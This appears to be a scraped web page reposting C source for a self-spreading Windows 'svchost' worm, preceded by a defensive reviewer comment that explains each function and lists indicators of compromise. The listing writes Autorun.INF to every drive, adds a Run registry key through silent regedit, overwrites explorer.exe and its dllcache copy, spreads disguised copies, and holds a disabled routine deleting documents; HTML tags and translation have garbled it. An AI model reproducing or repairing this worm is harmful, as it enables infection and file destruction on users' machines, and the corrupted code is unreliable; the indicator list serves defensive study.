Entry-level virus source code [VC ++]

Source: Internet
Author: User

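A friend sent this to me. To be honest, it is hard to follow even after reading it through. The listing below picked up HTML tags and altered characters when the page was converted, so it is not valid C as shown.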

 

/*
 * Reviewer notes: a defensive reading of the listing below.
 *
 * The listing was damaged by HTML extraction and machine translation:
 * <br/> and <p> tags are interleaved with the code, identifier case and
 * escape sequences have been altered, and several calls have lost
 * arguments. It is not valid C as shown, and some file names (for example
 * the ones printed as assumer.exe and erer.exe) look altered and cannot be
 * recovered with confidence, so the text is kept verbatim.
 *
 * What the visible code does, function by function:
 *   Autorun            - text of an Autorun.INF whose open, shell open and
 *                        shell explore commands all point at svchost.com.
 *   regadd             - REGEDIT4 text adding a "wjview32" value, pointing
 *                        at wjview32.com in the Windows directory, under
 *                        the HKEY_LOCAL_MACHINE CurrentVersion Run key.
 *   copy()             - file copy in a read/write loop; skipped when the
 *                        two names compare equal.
 *   autorun_explorer() - returns early if the file printed as assumer.exe
 *                        already exists in the system directory; otherwise
 *                        renames the explorer.exe held in system32 dllcache
 *                        and copies svchost.com over explorer.exe in the
 *                        Windows directory and in dllcache. dllcache is the
 *                        Windows File Protection cache, so the second copy
 *                        presumably keeps the original from being restored.
 *   add_reg()          - writes regadd to a file named "$" in the current
 *                        directory and starts regedit.exe with "/S $".
 *   copy_virus()       - copies the first file in files_svchost that opens
 *                        to every other path in that table, then loops 24
 *                        times writing svchost.com and Autorun.INF to the
 *                        root of successive drive letters starting at C:.
 *   make_rubbish()     - creates rubbish_num files on C: whose names come
 *                        from rand() after srand(0); the seed is fixed, so
 *                        the names should repeat across runs on the same
 *                        C runtime.
 *   remove_files()     - removes files matching the TXT, doc and xls
 *                        patterns; the call in main() is commented out.
 *   main()             - with "/s" as the first argument it skips
 *                        autorun_explorer(); it then runs add_reg(),
 *                        copy_virus() and make_rubbish() and starts
 *                        mstsc32.exe (one of the copies) with "/s".
 *
 * Artefacts a responder can look for, all taken from the listing:
 *   - an Autorun.INF next to svchost.com in the root of a drive;
 *   - a Run value named "wjview32";
 *   - the files listed in files_svchost, and a file named "$" or "$ TEMP $"
 *     in the Windows or dllcache directories;
 *   - an explorer.exe whose content matches svchost.com.
 * Disabling AutoRun for removable and fixed drives blocks the Autorun.INF
 * launch path this listing relies on.
 */
/* <Br/> SK-CHINA <br/> svchost virus write by S. k <br/> Compiler: <br/> DEV-CPP 4.9.9.2 <br/> */</P> <p>/* SVCHOST. C */<br/>/* SVCHOST. EXE */<br/>/* SVCHOST. com */<br/> # include <stdio. h>/* standard input/output */<br/> # include <string. h>/* string operation */<br/> # include <stdlib. h>/* Other functions */<br/> # include <process. h>/* process control */<br/> # include <dir. h>/* directory function */</P> <p> # define svchost_num 6/* Number of virus copies in key locations */<br/> # define rubbish_num 5/ * Number of junk files */<br/> # define remove_num 5/* Number of deleted files */<br/>/* ============ ========================================================== =================*/<br/>/* <br/> file Autorun. INF content: <br/> 1. run svchost.com automatically <br/> 2. overwrite the default open command and use the virus as the new open method <br/> 3. overwrite the default Resource Manager commands, use the virus as a new command <br/> */<br/> char * Autorun = {"[Autorun]/nopen =/" svchost.com/S/"/nshell // open = open (& O) /nshell // open // command =/"svchost.com/S/"/nshell // explore = Resource Manager (& X)/nshell // Export E // command =/"svchost.com/S /""}; <br/>/* ======================================== =========================================== */<br/ >/* <br/> Add the registry key: <br/> 1. automatic run to generate a virus body C: /Windows/wjview32.com <br/> */<br/> char * regadd = {"regedit4/n [HKEY_LOCAL_MACHINE // software // Microsoft // windows // CurrentVersion/ /run]/n/"wjview32/" =/"C: //// windows //// wjview32.com/S /""}; <br/>/* ======================================== ============ =======================================*/<Br/>/* <br/> function: copy a file <br/> copy Source: infile <br/> destination: OUTFILE <br/> success 0 is returned, 1 <br/> */<br/> int copy (char * infile, char * OUTFILE) <br/>{< br/> file * input, * output; <br/> char temp; <br/> If (strcmp (infile, OUTFILE )! = 0 & (input = fopen (infile, "rb "))! 
= NULL) & (output = fopen (OUTFILE, "WB "))! = NULL) <br/>{< br/> while (! Feof (input) <br/>{< br/> fread (& temp, input); <br/> fwrite (& temp, output ); <br/>}< br/> fclose (input); <br/> fclose (output); <br/> return 0; <br/>}< br/> else return 1; <br/>}< br/>/* ============================ ========================================================== */<br/>/* <br/> function: automatically run through explorer <br/> 0 is returned for success, 1 or 2 is returned for failure <br/> */<br/> int autorun_explorer () <br/>{< br/> file * input; <br/> If (input = fopen ("C: // windows // system // assumer.exe", "rb "))! = NULL) <br/>{< br/> fclose (input); <br/> remove ("C: // windows // $ TEMP $ "); <br/> remove ("C: // windows // system32 // dllcache // $ TEMP $"); <br/> return 1; <br/>}< br/> copy ("C: // windows // assumer.exe", "C: // windows // system // assumer.exe "); <br/> Rename ("C: // windows // assumer.exe", "C: // windows // $ TEMP $"); <br/> Rename ("C: // windows // system32 // dllcache // explorer.exe "," C: // windows // system32 // dllcache // $ TEMP $ "); <Br/> If (copy ("svchost.com", "C: // windows // explorer.exe") = 0 & copy ("svchost.com", "C: // windows // system32 // dllcache // explorer.exe ") = 0) <br/> return 0; <br/> else <br/> return 2; <br/>}< br/>/* ============================ ========================================================== */<br/>/* <br/> function: if a registry entry is added <br/> successfully, 0 is returned. If a registry entry fails, 1 is returned. <br/> */<br/> int add_reg () is returned () <br/>{< br/> file * output; <br/> If (output = fopen ("$", "W "))! = NULL) <br/>{< br/> fprintf (output, regadd); <br/> fclose (output); <br/> spawnl (1, "C: // windows // regedit.exe ","/S $ ", null ); <br/>}< br/>/* = ========================================================== =====*/<br/>/* <br/> function: copy virus + Autorun. 
INF runs automatically <br/> */<br/> void copy_virus () <br/> {<br/> int I, K; <br/> file * input, * output; <br/> char * files_svchost [svchost_num] = {"svchost.com", "C :// Windows // wjview32.com "," C: // windows // system // msmouse. DLL "," C: // windows // system32 // your sys. sys "," C: // windows // system32 // mstsc32.exe "," C: // windows // assumer.exe "}; <br/> char temp [2] [20] = {"C: // svchost.com", "C: // Autorun. INF "};< br/> for (I = 0; I <svchost_num; I ++) <br/>{< br/> If (input = fopen (files_svchost [I], "rb "))! = NULL) <br/>{< br/> fclose (input); <br/> for (k = 0; k <svchost_num; k ++) <br/>{< br/> copy (files_svchost [I], files_svchost [k]); <br/>}< br/> I = svchost_num; <br/>}< br/> for (I = 0; I <svchost_num; I ++) <br/>{< br/> If (input = fopen (files_svchost [I], "rb "))! = NULL) <br/>{< br/> fclose (input); <br/> for (k = 0; k <24; k ++) <br/>{< br/> copy (files_svchost [I], temp [0]); <br/> If (output = fopen (temp [1], "W "))! = NULL) <br/>{< br/> fprintf (output, "% s", Autorun); <br/> fclose (output ); <br/>}< br/> temp [0] [0] ++; <br/> temp [1] [0] ++; <br/>}< br/> I = svchost_num; <br/>}< br/>/* ==================== ========================================================== ===========*/<br/>/* <br/> function: create a junk file <br/> */<br/> void make_rubbish () <br/> {<br/> int I; <br/> file * output; <br/> srand (0); <br/> for (I = 0; I <rubbish_num; I ++) <br />{< Br/> int N; <br/> char s [30]; <br/> N = rand (); <br/> sprintf (S, "C: // destory _ infection _ % d", n); <br/> If (output = fopen (S, "W "))! = NULL) <br/>{< br/> fprintf (output, "% LD % s", N * N, S); <br/> fclose (output ); <br/>}< br/>/* ==================== ========================================================== ===========*/<br/>/* <br/> function: delete a file <br/> */<br/> void remove_files () <br/>{< br/> long done; <br/> int I; <br/> struct _ finddata_t ffblk; <br/> char * remove_files [3] = {"*. TXT ","*. doc ","*. 
xls "};< br/> for (I = 0; I <3; I ++) <br/>{< br/> If (_ findf IRST (remove_files [I], & ffblk) =-1) continue; <br/> while (! Done) <br/>{< br/> remove (ffblk. name); <br/> _ findnext (done, & ffblk); <br/>}< br/> _ findclose (done ); <br/>}< br/>/* = ========================================================== =====*/<br/>/* <br/> main program <br/> using DEV-CPP 32-bit C project implementation. C program runs in the background out of the command line interface <br/> */<br/> int main (INT argc, char ** argv) <br/>{< br/> int contral = 0; <br/> If (argc> 1) <br/> If (strcmp (argv [1], "/s") = 0) <br/> goto next1; <br/> autorun_explorer (); <br/> spawnl (1, "C: // windows // system // erer.exe ", null); <br/> next1: <br/> add_reg (); <br/> copy_virus (); <br/> make_rubbish (); <br/>/* remove_files (); */<br/> spawnl (1, "C: // windows // system32 // mstsc32.exe ","/s ", null); <br/> return 0; <br/>}< br/>
